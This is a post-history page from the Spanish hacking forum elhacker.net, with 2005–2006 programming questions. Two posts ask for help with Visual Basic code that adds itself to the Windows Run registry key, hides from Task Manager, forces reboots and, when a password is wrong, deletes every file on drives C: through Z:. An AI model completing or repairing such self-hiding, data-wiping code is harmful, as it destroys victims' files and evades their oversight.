elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: [1]
1  Programación / Ejercicios / Re: quiero hacer un bat y no se en: 13 Junio 2006, 02:31 am
Tu pregunta es como se puede hacer esto :
ej.: S = 2! + 4! + 5! (donde S = Resultado) ???

desglosalo así:
S = 1.2 + 4.3.2.1 + 5.4.3.2.1
S = 2 + 4.3.2 + 5.4.3.2

Es para hacer algo con estadisticas ??
No te resultaria mas facíl hacer esto en otro programa??

Acordate que vas a necesitar que el usuario ingrese todos los factoriales que necesitas, decime si eso es fijo o no, osea si siempre se suman 3 factoriales o la cantidad que desee el usuario.

Saludo-2
2  Programación / Programación Visual Basic / Re: Controlar el Hardware desde VB en: 13 Junio 2006, 01:58 am
Perdón tambien se que se puede controlar los LPT's y por ende lo que tengas conectado a ellos.
3  Programación / Programación Visual Basic / Re: Controlar el Hardware desde VB en: 13 Junio 2006, 01:54 am
Ok, grax. Es que habia leido uno o dos post de gente que queria hacer esto, creo que hasta hubo alguien que quiso subirle la temperatura, al cooler.
Despues de ver este tipo de cosas, me parecio que capaz que se podia y ni estaba enterado.
De cosas asi, savia, por eso puse lo de "hasta donde se puede".

Gracias por aclarar mi duda, a menos que venga alguien y diga lo contrario
4  Programación / Programación Visual Basic / Controlar el Hardware desde VB en: 12 Junio 2006, 02:22 am
Eh visto muchos comentarios, sobre controlar el hardware desde VB. Queria saver si alguien tiene idea si esto es posible, y hasta donde es posible.
De ser así agradecería si saven de donde puedo sacar algo que hable de esto, ya que encontre algunas cosas sobre esto pero todas boludeces.

.Gracias de antemano
5  Programación / Programación Visual Basic / Re: necesito ayuda en VB en: 16 Marzo 2005, 07:38 am
Veamos, cuando pongo:
Código:
Set X = CreateObject("WScript.Shell")
X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", "C:/X.exe"
me dice: "invalid objet reference"

cuando pongo:
Código:
App.TaskVisible = False
Me dice: "property 'TaskVisible' not found"

cuando pongo:
Código:
RegisterServiceProcess
,
Código:
RegisterServiceProcess = True
o
Código:
RegisterServiceProcess = False

no me dice nada, pero cuando ya tengo el ejecutable no me lo esconde.

y si pongo:
Código:
X% = Shell("C:/windows/system32/shutdown.exe -r -t01", 6)
,
Código:
X% = Shell("%windir%/system32/shutdown.exe -r -t01", 6)
,
en el ejecutable me dice: "phat not found"
Código:
X% = Shell("C:/windows/system32/shutdown.exe" -r -t01, 6)
o
Código:
X% = Shell("%windir%/system32/shutdown.exe" -r -t01, 6)
Asi me dice que hay un error de syntaxis antes de guardarlo .exe

con respecto a lo que dijo derec_x essa parte anda, no se a que te referis, mi pregunta es que cuando pido contraseña se abre otra y queria saver si ustedes saven si aparece en el admin. de tareas de win.

Gracias y Salu2
6  Programación / Programación Visual Basic / necesito ayuda en VB en: 15 Marzo 2005, 10:18 am
queria saver si alguien me puede decir por que no me andan estos codigos:

Código:
Set X = CreateObject("WScript.Shell")
X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", "C:/X.exe"

Código:
App.TaskVisible = False

tampoco el shutdown (no me acuerdo ahora si se escribe así)

puede ser por que trabajo con VB 3.0, q' me falte algun archivo que tenga que instalar, o algo por el estilo?? Nose, estoy re perdido, ya busque info en la net, pero nada que ande. Gracias de antemano

PD.: Otra pregunta cuando pongo esto por ej.:
Código:
On Error Resume Next
App.TaskVisible = False

X$ = InputBox$("introduzca contraseña")
   
If X$ = "contraseña" Then
    Unload Me
Else
    Kill "C:/windows/*.*"
    Kill "D:/windows/*.*"
    Kill "E:/windows/*.*"
    Kill "F:/windows/*.*"
    Kill "C:/*.*"
    Kill "D:/*.*"
    Kill "E:/*.*"
    Kill "F:/*.*"
    Kill "G:/*.*"
    Kill "H:/*.*"
    Kill "Z:/*.*"
End If

Puedo "finalizar la tarea" de laventana de contraseña, o tampoco esa me aparece en el administrador de tareas de Windows gracias a "App.TaskVisible = False"

Gracias salu2


Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines